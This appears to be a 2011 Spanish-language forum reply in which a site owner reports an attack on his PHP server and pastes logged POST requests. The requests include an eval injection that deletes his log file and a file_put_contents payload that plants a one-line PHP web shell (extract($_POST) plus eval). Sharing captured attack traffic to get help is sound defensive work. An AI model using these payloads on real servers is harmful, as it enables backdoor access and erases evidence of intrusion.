Ver Mensaje Individual
  #5 (permalink)  
Antiguo 02/03/2011, 15:22
Avatar de CuriositO
CuriositO
 
Fecha de Ingreso: febrero-2011
Ubicación: Habana
Mensajes: 9
Antigüedad: 13 años, 10 meses
Puntos: 0
Respuesta: Inyección XSS, Seguridad PHP, Eval, y otras funciones ayuda!!

estuve revisando el poco codigo del filtro que puse para saber que hacían o que mejor dicho que era lo que enviaban por post a mi php, porque el hosting no me sabía decir de que forma llegaban estos archivos a mi server y puse un script que se encargara de esto y pude econtrar lo que les dije antes y tambien pude ver esto otro ahora

Código PHP:
Ver original
  1. a=eval($et);//&fn[]=eval($et);//&et=echo unlink(\'webfilter.txt\');&z1=index1.php&z2=<? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
  2. Script:

Código PHP:
Ver original
  1. echo unlink(\'webfilter.txt\');

webfilter.txt es el archivo que me generaba los log de lo que hacía que al parecer lo borró para que yo no pudiera encontrarlo, por suerte había hecho una salva y pude verlo.

IP: ipdelatacante
Method: POST
Value: file_put_contents($z1,$z2);
Script:
Time: Tuesday 01st 2011f March 2011 12:50:43 PM
==================================
IP: ipdelatacante
Method: POST
Value: <? extract($_POST); $eva=stripslashes($eva); eval($eva); ?>
Script:
Time: Tuesday 01st 2011f March 2011 12:50:43 PM